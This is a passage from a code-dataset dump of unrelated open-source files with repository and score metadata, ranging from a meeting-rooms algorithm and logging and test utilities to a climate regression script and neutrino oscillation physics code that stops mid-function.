UtkarshPathrabe/Competitive-Coding
13
12750379
from typing import List from heapq import heappop, heappush class Solution: def minMeetingRooms(self, intervals: List[List[int]]) -> int: if not intervals: return 0 intervals.sort(key = lambda x : x[0]) occupiedRooms = [] heappush(occupiedRooms, intervals[0][1]) for interval in intervals[1:]: if occupiedRooms[0] <= interval[0]: heappop(occupiedRooms) heappush(occupiedRooms, interval[1]) return len(occupiedRooms)
1.851563
2
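A quick worked check of the heap-based solution above, assuming the Solution class (with the typing and heapq imports added to the record) is in scope; the interval lists are illustrative.

# [[0,30],[5,10],[15,20]]: [5,10] overlaps [0,30] and forces a second room;
# [15,20] reuses the room freed at time 10, so two rooms suffice.
print(Solution().minMeetingRooms([[0, 30], [5, 10], [15, 20]]))  # -> 2
# [[7,10],[2,4]] never overlap, so a single room is enough.
print(Solution().minMeetingRooms([[7, 10], [2, 4]]))             # -> 1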
psana/psana/xtcav/examples/ex-ipython.py
JBlaschke/lcls2
16
12750507
""" to research dataset and event-loop object in ipython """ from psana.pyalgos.generic.NDArrUtils import print_ndarr from psana import DataSource ds = DataSource(files='/reg/g/psdm/detector/data2_test/xtc/data-amox23616-r0104-e000010-xtcav.xtc2') orun = next(ds.runs()) det = orun.Detector('xtcav') print('test_xtcav_data expt: %s runnum: %d\n' % (orun.expt, orun.runnum)) for nev,evt in enumerate(orun.events()): if nev>10 : break print('Event %03d'%nev, end='') #print_ndarr(det.raw.array(evt), ' det.raw.array(evt):') print_ndarr(det.raw(evt), ' det.raw(evt):') #print('XXXXX', evt._dgrams[0].xtcav[0].raw.raw) #----------
1.6875
2
tests/apitests/python/library/user.py
mytting/harbor-arm64
5
12750635
<filename>tests/apitests/python/library/user.py # -*- coding: utf-8 -*- import base import swagger_client class User(base.Base): def create_user(self, name=None, email = None, user_password=<PASSWORD>, realname = None, role_id = None, **kwargs): if name is None: name = base._random_name("user") if realname is None: realname = base._random_name("realname") if email is None: email = '%<EMAIL>' % (realname,"vmware") if user_password is None: user_password = "<PASSWORD>" if role_id is None: role_id = 0 client = self._get_client(**kwargs) user = swagger_client.User(username = name, email = email, password = <PASSWORD>, realname = realname, role_id = role_id) _, status_code, header = client.users_post_with_http_info(user) base._assert_status_code(201, status_code) return base._get_id_from_header(header), name def get_users(self, username=None, email=None, page=None, page_size=None, **kwargs): client = self._get_client(**kwargs) params={} if username is not None: params["username"] = username if email is not None: params["email"] = email if page is not None: params["page"] = page if page_size is not None: params["page_size"] = page_size data, status_code, _ = client.users_get_with_http_info(**params) base._assert_status_code(200, status_code) return data def get_user(self, user_id, **kwargs): client = self._get_client(**kwargs) data, status_code, _ = client.users_user_id_get_with_http_info(user_id) base._assert_status_code(200, status_code) return data def get_user_current(self, **kwargs): client = self._get_client(**kwargs) data, status_code, _ = client.users_current_get_with_http_info() base._assert_status_code(200, status_code) return data def delete_user(self, user_id, expect_status_code = 200, **kwargs): client = self._get_client(**kwargs) _, status_code, _ = client.users_user_id_delete_with_http_info(user_id) base._assert_status_code(expect_status_code, status_code) return user_id def update_user_pwd(self, user_id, new_password=<PASSWORD>, old_password=<PASSWORD>, **kwargs): if old_password is None: old_password = "" password = <PASSWORD>(<PASSWORD>, <PASSWORD>) client = self._get_client(**kwargs) _, status_code, _ = client.users_user_id_password_put_with_http_info(user_id, password) base._assert_status_code(200, status_code) return user_id def update_user_profile(self, user_id, email=None, realname=None, comment=None, **kwargs): client = self._get_client(**kwargs) user_rofile = swagger_client.UserProfile(email, realname, comment) _, status_code, _ = client.users_user_id_put_with_http_info(user_id, user_rofile) base._assert_status_code(200, status_code) return user_id def update_user_role_as_sysadmin(self, user_id, IsAdmin, **kwargs): client = self._get_client(**kwargs) has_admin_role = swagger_client.HasAdminRole(IsAdmin) _, status_code, _ = client.users_user_id_sysadmin_put_with_http_info(user_id, has_admin_role) base._assert_status_code(200, status_code) return user_id
1.492188
1
neorl/benchmarks/__init__.py
XuboGU/neorl
1
12750763
<reponame>XuboGU/neorl<gh_stars>1-10 def bench_2dplot(function, domain=(-100,100), points=30, savepng=None): """ Creates a 2D surface plot of a function. Args: function (function): The objective function to be called at each point. domain (num, num): The inclusive (min, max) domain for each dimension. points (int): The number of points to discretize in x and y dimensions. savepng (str): save png file for the plot """ from mpl_toolkits.mplot3d import Axes3D # <--- This is important for 3d plotting import matplotlib.pyplot as plt import numpy as np try: dimension=2 # create points^2 tuples of (x,y) and populate z xys = np.linspace(domain[0], domain[1], points) xys = np.transpose([np.tile(xys, len(xys)), np.repeat(xys, len(xys))]) zs = np.zeros(points*points) if dimension > 2: # concatenate remaining zeros tail = np.zeros(dimension - 2) for i in range(0, xys.shape[0]): zs[i] = function(np.concatenate([xys[i], tail])) else: for i in range(0, xys.shape[0]): zs[i] = function(xys[i]) # create the plot ax = plt.axes(projection='3d') X = xys[:,0].reshape((points, points)) Y = xys[:,1].reshape((points, points)) Z = zs.reshape((points, points)) ax.plot_surface(X, Y, Z, cmap='ocean', edgecolor='none') ax.set_title(function.__name__) ax.set_xlabel('x') ax.set_ylabel('y') ax.set_zlabel('z') if savepng: plt.savefig(savepng, dpi=200, format='png') plt.show() except: raise Exception ('--error: Plotting fails, if you use CEC17, then f11-f20, f29, f30 are not defined for d=2 dimensions')
2.65625
3
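A hedged sketch of calling bench_2dplot on a simple objective. The sphere function and output file name are illustrative only, and the import path is inferred from the record's location (neorl/benchmarks/__init__.py).

import numpy as np
from neorl.benchmarks import bench_2dplot  # path inferred from the record's file location

def sphere(x):
    # simple 2-D objective used purely for illustration
    return float(np.sum(np.asarray(x) ** 2))

bench_2dplot(sphere, domain=(-5, 5), points=40, savepng='sphere.png')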
risk/risk_stratification.py
chandojo/ExerciseCoachTools
0
12750891
from validation.value_validation import ValidateValue def risk_classification(patient): classification = RiskFactorAssessment(patient).result_risk_classification() return classification def total_risk_factors(patient): total = RiskFactorAssessment(patient).net_risk_factors() return total class Patient(object): def __init__(self, sex, age, smoker, sedentary, bmi, waist_girth, male_family_death_before_55, female_family_death_before_65, systolic, diastolic, hypertensive, ldl, hdl, using_lipid_lowering_medication, cholesterol, fasting_glucose, oral_glucose_tolerance): self._sex = ValidateValue(sex).valueIsMaleFemale() self._age = ValidateValue(age).valueIsPositiveInteger() self._smoker = ValidateValue(smoker).valueIsYesNo() self._sedentary = ValidateValue(sedentary).valueIsYesNo() self._bmi = ValidateValue(bmi).valueIsPositiveInteger() self._waist_girth = ValidateValue(waist_girth).valueIsPositiveInteger() self._male_family_death_before_55 = ValidateValue(male_family_death_before_55).valueIsYesNo() self._female_family_death_before_65 = ValidateValue(female_family_death_before_65).valueIsYesNo() self._systolic = ValidateValue(systolic).valueIsPositiveInteger() self._diastolic = ValidateValue(diastolic).valueIsPositiveInteger() self._hypertensive = ValidateValue(hypertensive).valueIsYesNo() self._ldl = ValidateValue(ldl).valueIsPositiveInteger() self._hdl = ValidateValue(hdl).valueIsPositiveInteger() self._using_lipid_lowering_medication = ValidateValue(using_lipid_lowering_medication).valueIsYesNo() self._cholesterol = ValidateValue(cholesterol).valueIsPositiveInteger() self._fasting_glucose = ValidateValue(fasting_glucose).valueIsPositiveInteger() self._oral_glucose_tolerance = ValidateValue(oral_glucose_tolerance).valueIsPositiveInteger() class RiskFactorAssessment(object): def __init__(self, patient): self._patient = patient def result_risk_classification(self): classification = RiskFactorAssessmentClassification().patient_risk_classification(self.net_risk_factors()) return classification def net_risk_factors(self): total = self._get_risk_factor_count() - self._get_negative_risk_factor_count() return total def _get_risk_factor_count(self): _count_risk_factors = [ self._is_age_risk(), self._is_obesity_risk(), self._patient._smoker, self._patient._sedentary, self._is_familial_risk(), self._is_systolic_risk(), self._is_diastolic_risk(), self._patient._hypertensive, self._is_dyslipidemia_risk(), self._is_pre_diabetes_risk() ] return _count_risk_factors.count(True) def _get_negative_risk_factor_count(self): _count_negative_risk_factor = [ self._is_hdl_negative_risk() ] return _count_negative_risk_factor.count(True) def _is_obesity_risk(self): if self._patient._bmi and self._patient._waist_girth == 0: return False elif self._patient._bmi > 30: return True elif self._patient._waist_girth > 40 and self._patient._sex == 'male' or self._patient._waist_girth > 35 and self._patient._sex == 'female': return True else: return False def _is_age_risk(self): if (self._patient._sex == "male" and self._patient._age >= 45) or (self._patient._sex == "female" and self._patient._age >=55): return True else: return False def _is_familial_risk(self): if self._patient._male_family_death_before_55 == True or self._patient._female_family_death_before_65 == True: return True else: return False def _is_systolic_risk(self): if self._patient._systolic >= 120: return True else: return False def _is_diastolic_risk(self): if self._patient._diastolic >= 80: return True else: return False def _is_dyslipidemia_risk(self): if 
self._patient._ldl > 130 or self._patient._hdl < 40 or self._patient._cholesterol > 200: return True else: return False def _is_pre_diabetes_risk(self): if self._patient._fasting_glucose >= 100 and self._patient._fasting_glucose <= 126 or self._patient._oral_glucose_tolerance >= 140 and self._patient._oral_glucose_tolerance < 200: return True else: return False def _is_hdl_negative_risk(self): if self._patient._hdl > 60: return True else: return False class RiskFactorAssessmentClassification(object): def __init__(self): pass def patient_risk_classification(self, value): if value <= 1: return self._low_risk_category(value) if value == 2: return self._moderate_risk_category(value) if value > 2: return self._high_risk_category(value) def _low_risk_category(self, value): return("Your risk total is %s. You are at a low risk for cardiovascular disease. Medical check-up no necessary for participation in physical activity." % value) def _moderate_risk_category(self, value): return("Your risk total is %s. You are at a moderate risk for cardiovascular disease. Medical check-up recommended for participation in vigorous physical activity." % value) def _high_risk_category(self, value): return("Your risk total is %s. You are at a high risk for cardiovascular disease. Medical check-up highly recommended before any physical activity." % value)
1.632813
2
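A hypothetical usage sketch for the risk-stratification record above. The accepted value formats ('male'/'female', 'yes'/'no', positive numbers) are assumptions read off the ValidateValue method names, not something the record states; every number below is illustrative.

# Hypothetical patient; all values and their formats are assumptions.
patient = Patient(sex='male', age=48, smoker='no', sedentary='yes', bmi=31,
                  waist_girth=41, male_family_death_before_55='no',
                  female_family_death_before_65='no', systolic=130, diastolic=85,
                  hypertensive='no', ldl=135, hdl=45,
                  using_lipid_lowering_medication='no', cholesterol=210,
                  fasting_glucose=105, oral_glucose_tolerance=120)
print(total_risk_factors(patient))
print(risk_classification(patient))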
tests/test_mqtt.py
sourcesimian/mqtt-kube
0
12751019
from mqtt_kube.mqtt import TopicMatcher class TestTopicMatcher: def test_basic(self): assert TopicMatcher('topic/one').match('topic/one') == True assert TopicMatcher('topic/two').match('topic/one') == False def test_plus(self): assert TopicMatcher('topic/+/plus').match('topic/one/plus') == True assert TopicMatcher('topic/+/plus').match('topic/one/extra/plus') == False assert TopicMatcher('++/plus').match('topic/one/plus') == False assert TopicMatcher('+one/plus').match('topic/one/plus') == False assert TopicMatcher('+ne/plus').match('one/plus') == False def test_hash(self): assert TopicMatcher('#').match('topic/one/plus') == True assert TopicMatcher('topic/#').match('topic/one/plus') == True assert TopicMatcher('topic/two/#').match('topic/one/plus') == False assert TopicMatcher('#/plus').match('one/plus') == False def test_plus_and_hash(self): assert TopicMatcher('+/+/plus/#').match('topic/one/plus/many/more') == True assert TopicMatcher('+/+/minus/#').match('topic/one/plus/many/more') == False
1.835938
2
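The tests above double as documentation of the '+' and '#' wildcard rules; a small sketch reusing the same import, with illustrative topic names:

from mqtt_kube.mqtt import TopicMatcher  # same import the tests use

matcher = TopicMatcher('sensors/+/temperature')
for topic in ('sensors/kitchen/temperature',        # matches: '+' spans exactly one level
              'sensors/kitchen/humidity',           # no match: last level differs
              'sensors/kitchen/oven/temperature'):  # no match: extra level
    print(topic, '->', matcher.match(topic))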
eta/core/log.py
kunyilu/eta
1
12751147
<reponame>kunyilu/eta<filename>eta/core/log.py ''' Core logging infrastructure. Copyright 2017, Voxel51, Inc. voxel51.com <NAME>, <EMAIL> ''' # pragma pylint: disable=redefined-builtin # pragma pylint: disable=unused-wildcard-import # pragma pylint: disable=wildcard-import from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals from builtins import * # pragma pylint: enable=redefined-builtin # pragma pylint: enable=unused-wildcard-import # pragma pylint: enable=wildcard-import import logging import os import sys import eta import eta.core.utils as etau from eta.core.config import Config root_logger = logging.getLogger() logger = logging.getLogger(__name__) # Basic logging defaults DEFAULT_BASIC_LEVEL = logging.INFO DEFAULT_BASIC_FORMAT = "%(message)s" # Custom logging defaults DEFAULT_STREAM_TO_STDOUT = True DEFAULT_STDOUT_FORMAT = "%(message)s" DEFAULT_STDOUT_LEVEL = "INFO" DEFAULT_FILENAME = None DEFAULT_FILE_FORMAT = \ "%(asctime)s - %(name)-18s - %(levelname)-8s - %(message)s" DEFAULT_FILE_LEVEL = "INFO" DEFAULT_DATEFMT = "%Y-%m-%d %H:%M:%S" DEFAULT_ENCODING = "utf8" def basic_setup(level=DEFAULT_BASIC_LEVEL, fmt=DEFAULT_BASIC_FORMAT): '''Sets up basic logging to stdout. Args: level: the logging level. The default is DEFAULT_BASIC_LEVEL fmt: the logging format. The default is DEFAULT_BASIC_FORMAT ''' reset() handler = logging.StreamHandler(stream=sys.stdout) handler.setFormatter(logging.Formatter(fmt=fmt)) handler.setLevel(level) root_logger.addHandler(handler) def custom_setup(lc, rotate=False): '''Sets up custom logging. Args: lc: a LoggingConfig instance rotate: True/False. If True, any existing logs are rotated and new messages are written to a new logfile. If False, new messages are appended to the existing log (if any). The default is False ''' # Messages to log after setup msgs = [] # Reset logging msgs.append("Resetting logging") reset() # Stdout logging if lc.stream_to_stdout: stream_handler = logging.StreamHandler(stream=sys.stdout) stream_handler.setFormatter( logging.Formatter(fmt=lc.stdout_format, datefmt=lc.datefmt)) stream_handler.setLevel(getattr(logging, lc.stdout_level)) root_logger.addHandler(stream_handler) msgs.append("Logging to stdout at level %s" % lc.stdout_level) # File logging if lc.filename: etau.ensure_basedir(lc.filename) if rotate: msgs += _rotate_logs(lc.filename) file_handler = logging.FileHandler( lc.filename, mode="at", encoding=lc.encoding) file_handler.setFormatter( logging.Formatter(fmt=lc.file_format, datefmt=lc.datefmt)) file_handler.setLevel(getattr(logging, lc.file_level)) root_logger.addHandler(file_handler) msgs.append("Logging to %s at level %s" % (lc.filename, lc.file_level)) msgs.append("Logging initialized") # Initial logging output eta.startup_message() for msg in msgs: logger.info(msg) def set_logging_level(level): '''Sets the logging level to the given value. Args: level: the logging.<level> to set ''' for h in root_logger.handlers: h.setLevel(level) def flush(): '''Flushes logging handlers. It is only necessary to call this method when multiple processes are writing to a single log file (e.g., when running a pipeline). ''' for h in root_logger.handlers: h.flush() def reset(): '''Resets logging. 
Performs the following tasks: - removes all existing handlers from the root logger - sets the root logger level to DEBUG (the effective logging level is determined on a per-handler basis) - uses sys.excepthook to route all uncaught exceptions to the root logger ''' root_logger.handlers = [] root_logger.setLevel(logging.DEBUG) sys.excepthook = _excepthook def _rotate_logs(filename): # Locate existing logs logfile = _rotate_lambda(filename) num = 0 while os.path.isfile(logfile(num)): num += 1 # Rotate existing logs, if necessary msgs = [] if num > 0: msgs.append("Rotating %d existing log(s)" % num) for idx in range(num - 1, -1, -1): etau.move_file(logfile(idx), logfile(idx + 1)) return msgs def _rotate_lambda(filename): p, e = os.path.splitext(filename) patt = p + "-%d" + e return lambda num: patt % num if num > 0 else filename def _excepthook(*exc_info): root_logger.error("Uncaught exception", exc_info=exc_info) class LoggingConfig(Config): '''Logging configuration settings.''' def __init__(self, d): self.stream_to_stdout = self.parse_bool( d, "stream_to_stdout", default=DEFAULT_STREAM_TO_STDOUT) self.stdout_format = self.parse_string( d, "stdout_format", default=DEFAULT_STDOUT_FORMAT) self.stdout_level = self.parse_string( d, "stdout_level", default=DEFAULT_STDOUT_LEVEL) self.filename = self.parse_string( d, "filename", default=DEFAULT_FILENAME) self.file_format = self.parse_string( d, "file_format", default=DEFAULT_FILE_FORMAT) self.file_level = self.parse_string( d, "file_level", default=DEFAULT_FILE_LEVEL) self.datefmt = self.parse_string( d, "datefmt", default=DEFAULT_DATEFMT) self.encoding = self.parse_string( d, "encoding", default=DEFAULT_ENCODING)
1.289063
1
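A hedged sketch of the two setup paths in the logging module above; the config keys mirror LoggingConfig's fields, and the log file path is a placeholder.

import logging
import eta.core.log as etal  # module path taken from the record's file location

etal.basic_setup(level=logging.INFO)               # plain stdout logging
logging.getLogger(__name__).info("basic setup active")

lc = etal.LoggingConfig({
    "filename": "/tmp/eta.log",                    # placeholder path
    "stdout_level": "DEBUG",
})
etal.custom_setup(lc, rotate=True)                 # stdout + rotated file logging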
users/management/commands/send_overdue_reminders.py
maverick-labs-pune/wikirumours
0
12751275
import csv import datetime import os from django.contrib.gis.geos import Point from django.core.management import BaseCommand, CommandError from django.db import transaction from geopy import Nominatim from countries.models import Country from report.models import Report, Sighting, ReportedViaChoice from users.emails import overdue_reports_reminder from users.models import User class Command(BaseCommand): help = "send email reminders for overdue reports" def handle(self, *args, **kwargs): send_overdue_reminders() def send_overdue_reminders(): for user in User.objects.filter(role__in=[User.COMMUNITY_LIAISON, User.MODERATOR, User.ADMIN]): if user.enable_email_reminders: overdue_tasks = user.get_overdue_tasks() if overdue_tasks.count() and user.email: overdue_reports_reminder(overdue_tasks, user) print(f"Log email reminder sent to {user.email}")
1.476563
1
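Given its location under users/management/commands/, Django's standard command discovery exposes the module above by file name; inside a configured Django project it could be invoked programmatically (or as "python manage.py send_overdue_reminders" from a daily cron entry), for example:

from django.core.management import call_command

call_command("send_overdue_reminders")  # command name derived from the file name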
src/wai/annotations/imgaug/isp/crop/component/_Crop.py
waikato-ufdl/wai-annotations-processors
0
12751403
<reponame>waikato-ufdl/wai-annotations-processors<filename>src/wai/annotations/imgaug/isp/crop/component/_Crop.py import imgaug.augmenters as iaa from wai.common.cli.options import TypedOption, FlagOption from wai.annotations.imgaug.isp.base.component import BaseImageAugmentation class Crop(BaseImageAugmentation): """ Stream processor which crops images. """ percent_from: float = TypedOption( "-f", "--from-percent", type=float, help="the minimum percent to crop from images" ) percent_to: float = TypedOption( "-t", "--to-percent", type=float, help="the maximum percent to crop from images" ) update_size: bool = FlagOption( "-u", "--update-size", help="whether to update the image size after the crop operation or scale back to original size" ) def _default_suffix(self): """ Returns the default suffix to use for images when using "add" rather than "replace" as mode. :return: the default suffix :rtype: str """ return "-cropped" def _can_augment(self): """ Checks whether augmentation can take place. :return: whether can augment :rtype: bool """ return (self.percent_from is not None) and (self.percent_to is not None) def _create_pipeline(self, aug_seed): """ Creates and returns the augmentation pipeline. :param aug_seed: the seed value to use, can be None :type aug_seed: int :return: the pipeline :rtype: iaa.Sequential """ keep_size = not self.update_size if self.percent_from == self.percent_to: return iaa.Sequential([ iaa.Crop(percent=self.percent_from, keep_size=keep_size) ]) else: return iaa.Sequential([ iaa.Crop(percent=(self.percent_from, self.percent_to), keep_size=keep_size) ])
1.601563
2
research/Master_Thesis/regression_map.py
pjpetersik/ninolearn
13
12751531
<gh_stars>10-100 from mpl_toolkits.basemap import Basemap from sklearn import linear_model from sklearn.metrics import r2_score import numpy as np import matplotlib.pyplot as plt from scipy.stats import pearsonr from ninolearn.IO.read_processed import data_reader from os.path import join from ninolearn.private import plotdir # ============================================================================= # Read # ============================================================================= reader = data_reader(startdate='1980-01', enddate='2018-11', lon_min=100, lon_max=300) iod = reader.read_csv('iod') nino = reader.read_csv('nino3M') taux = reader.read_netcdf('taux', dataset='NCEP', processed='anom') taux = taux.sortby('lat', ascending=False) sst = reader.read_netcdf('sst', dataset='ERSSTv5', processed='anom') sst = sst.sortby('lat', ascending=False) olr = - reader.read_netcdf('olr', dataset='NCAR', processed='anom') olr = olr.sortby('lat', ascending=False) # ============================================================================= # Regression analysis # ============================================================================= SSTA_gradient = np.nanmean(np.gradient(sst.loc[dict(lat=0, lon=slice(120, 280))], axis=0), axis=1) OLR_mean = olr.loc[dict(lat=slice(5, -5), lon=slice(150, 210))].mean(dim='lon').mean(dim='lat') X = np.stack((nino, OLR_mean), axis=1) reg = linear_model.LinearRegression(fit_intercept=False) taux_flat = taux.values.reshape(taux.shape[0],-1) reg.fit(X, taux_flat) pred = reg.predict(X) score = r2_score(taux_flat, pred, multioutput='raw_values') score2 = np.zeros_like(score) p = np.zeros_like(score) for i in range(score2.shape[0]): score2[i], p[i] = pearsonr(pred[:,i], taux_flat[:,i]) score_map = score.reshape((taux.shape[1],taux.shape[2])) score2_map = score2.reshape((taux.shape[1],taux.shape[2])) p_map = p.reshape((taux.shape[1],taux.shape[2])) coef_sst = reg.coef_[:,0].reshape((taux.shape[1],taux.shape[2])) * X[:,0].std() coef_olr = reg.coef_[:,1].reshape((taux.shape[1],taux.shape[2])) * X[:,1].std() #coef_iod = reg.coef_[:,2].reshape((taux.shape[1],taux.shape[2])) * X[:,2].std() # ============================================================================= # Plot # ============================================================================= plt.close("all") # Setup vmax = 10 levels = np.linspace(-vmax, vmax, 21, endpoint = True) levels_r2 = np.linspace(0, 0.8, 21, endpoint = True) # Generate the base plot lon2, lat2 = np.meshgrid(taux.lon, taux.lat) fig, axs = plt.subplots(2, 1, figsize=(9,5)) m = [] for i in range(2): m.append(Basemap(projection='merc',llcrnrlat=-30,urcrnrlat=30,\ llcrnrlon=100,urcrnrlon=300,lat_ts=5,resolution='c', ax=axs[i])) x, y = m[i](lon2, lat2) m[i].drawparallels(np.arange(-90., 120., 15.), labels=[1,0,0,0], color='grey') if i == 1: m[i].drawmeridians(np.arange(0., 360., 30.), labels=[0,0,0,1], color='grey') else: m[i].drawmeridians(np.arange(0., 360., 30.), color='grey') m[i].drawmapboundary(fill_color='white') m[i].drawcoastlines() cs_r2 = m[i].contourf(x, y, score2_map**2, vmin=0.0,vmax=0.8, levels = levels_r2, cmap=plt.cm.Greens, extend='max') cs_p = m[i].contourf(x, y, p_map, levels=[0, 0.01], hatches = ['//'], alpha=0) # Overlay the base plot with cs_sst = m[0].contour(x, y, coef_sst, vmin=-vmax, vmax=vmax, levels=levels, cmap=plt.cm.seismic) cs_olr = m[1].contour(x, y, coef_olr, vmin=-vmax, vmax=vmax, levels=levels, cmap=plt.cm.seismic) #cs_iod = m[2].contour(x, y, coef_iod, vmin=-vmax, vmax=vmax, levels=levels, 
cmap=plt.cm.seismic) # Color bar fig.subplots_adjust(right=0.7) cbar_ax1 = fig.add_axes([0.75, 0.15, 0.02, 0.7]) cbar_ax2 = fig.add_axes([0.85, 0.15, 0.02, 0.7]) fig.colorbar(cs_sst, cax= cbar_ax1, label=r'$\tau_x$[m$^2$s$^{-2}$]') fig.colorbar(cs_r2, cax = cbar_ax2, label=r'$r^2$') plt.savefig(join(plotdir, 'regression_taux.jpg'), dpi=360)
1.710938
2
pyCEvNS/oscillation.py
Ikaroshu/pyCEvNS
5
12751659
<gh_stars>1-10 """ neutrino oscillation related funtions """ from .parameters import * # solar number density at r=0.05 solar radius, unit is MeV^3 (natural unit) __ne_solar = 4.163053492437814e-07 __nu_solar = 1.0053941490424488e-06 __nd_solar = 7.618722503535536e-07 def survival_solar(ev, epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e'): """ calculating survival/transitional probability of solar neutrino :param ev: neutrino energy in MeV :param epsi: nsi parameters :param nui: intial state :param nuf: final state, 0: electron neutrino, 1: muon neutrino, 2: tau neutrino :param op: oscillation parameters :return: survival/transitional probability """ op = op.copy() dic = {'e': 0, 'mu': 1, 'tau': 2} fi = dic[nui] ff = dic[nuf] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) v = np.sqrt(2) * gf * (__ne_solar * (epsi.ee() + np.diag(np.array([1, 0, 0]))) + __nu_solar * epsi.eu() + __nd_solar * epsi.ed()) hvac = umix @ m @ umix.conj().T def sorteig(w, vec): """ sort the eigenstates to make the resultant eigenvalue continuous """ minindex = 0 maxindex = 0 for j in range(3): if w[minindex] > w[j]: minindex = j for j in range(3): if w[maxindex] < w[j]: maxindex = j midindex = 3 - minindex - maxindex avec = np.array(vec) return np.array([avec[:, minindex], avec[:, midindex], avec[:, maxindex]]).T wr, vecr = np.linalg.eigh(hvac + v) utr = sorteig(wr, vecr) ws, vecs = np.linalg.eigh(hvac) uts = sorteig(ws, vecs) res = 0 for i in range(3): res += np.conj(utr[0, i]) * utr[0, i] * np.conj(uts[ff, i]) * uts[ff, i] return np.real(res) def survival_solar_amp(ev, epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e', **kwargs): """ calculating survival/transitional amplitude of solar neutrino, this is just hack, not real amplitude! 
:param ev: neutrino energy in MeV :param epsi: nsi parameters :param nui: intial state :param nuf: final state, 0: electron neutrino, 1: muon neutrino, 2: tau neutrino :param op: oscillation parameters :return: survival/transitional probability """ op = op.copy() dic = {'e': 0, 'mu': 1, 'tau': 2} fi = dic[nui] ff = dic[nuf] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) v = np.sqrt(2) * gf * (__ne_solar * (epsi.ee() + np.diag(np.array([1, 0, 0]))) + __nu_solar * epsi.eu() + __nd_solar * epsi.ed()) hvac = umix @ m @ umix.conj().T def sorteig(w, vec): """ sort the eigenstates to make the resultant eigenvalue continuous """ minindex = 0 maxindex = 0 for j in range(3): if w[minindex] > w[j]: minindex = j for j in range(3): if w[maxindex] < w[j]: maxindex = j midindex = 3 - minindex - maxindex avec = np.array(vec) return np.array([avec[:, minindex], avec[:, midindex], avec[:, maxindex]]).T wr, vecr = np.linalg.eigh(hvac + v) utr = sorteig(wr, vecr) ws, vecs = np.linalg.eigh(hvac) uts = sorteig(ws, vecs) res = 0 for i in range(3): res += np.conj(utr[fi, i]) * utr[fi, i] * np.conj(uts[ff, i]) * uts[ff, i] return np.sqrt(np.real(res)) # using Caylay-Hamilton theorem to calculate survival probability, it has probems at transitsion probabilities # # def survival_probability(ev, length, epsi=NSIparameters(), nui=0, nuf=0, # op=ocsillation_parameters(), ne=2.2*6.02e23*(100*meter_by_mev)**3): # o23 = np.matrix([[1, 0, 0], # [0, np.cos(op['t23']), np.sin(op['t23'])], # [0, -np.sin(op['t23']), np.cos(op['t23'])]]) # u13 = np.matrix([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], # [0, 1, 0], # [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) # o12 = np.matrix([[np.cos(op['t12']), np.sin(op['t12']), 0], # [-np.sin(op['t12']), np.cos(op['t12']), 0], # [0, 0, 1]]) # umix = o23 * u13 * o12 # m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) # vf = np.sqrt(2) * gf * ne * (epsi.ee() + 3 * epsi.eu() + 3 * epsi.ed()) # hf = umix * m * umix.H + vf # w, v = np.linalg.eigh(hf) # # print(w) # b = e**(-1j*w*length) # # print(b) # a = np.array([[1, 1, 1], -1j * length * w, -length**2 * w**2]).T # # print(a) # x = np.linalg.solve(a, b) # tnp.matrix = x[0] + -1j * length * x[1] * hf - length**2 * x[2] * hf.dot(hf) # # print(tnp.matrix) # return abs(tnp.matrix[nui, nuf])**2 def survival_const(ev, length=0.0, epsi=NSIparameters(), op=oscillation_parameters(), ne=2.2 * 6.02e23 * (100 * meter_by_mev) ** 3, nui='e', nuf='e'): """ survival/transitional probability with constant matter density :param ev: nuetrino energy in MeV :param length: oscillation length in meters :param epsi: epsilons :param nui: initail flavor :param nuf: final flavor :param op: oscillation parameters :param ne: electron number density in MeV^3 :return: survival/transitional probability """ op = op.copy() dic = {'e': 0, 'mu': 1, 'tau': 2, 'ebar': 0, 'mubar': 1, 'taubar': 2} fi = dic[nui] ff = dic[nuf] length = length / meter_by_mev if nuf[-1] == 'r': op['delta'] = -op['delta'] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), 
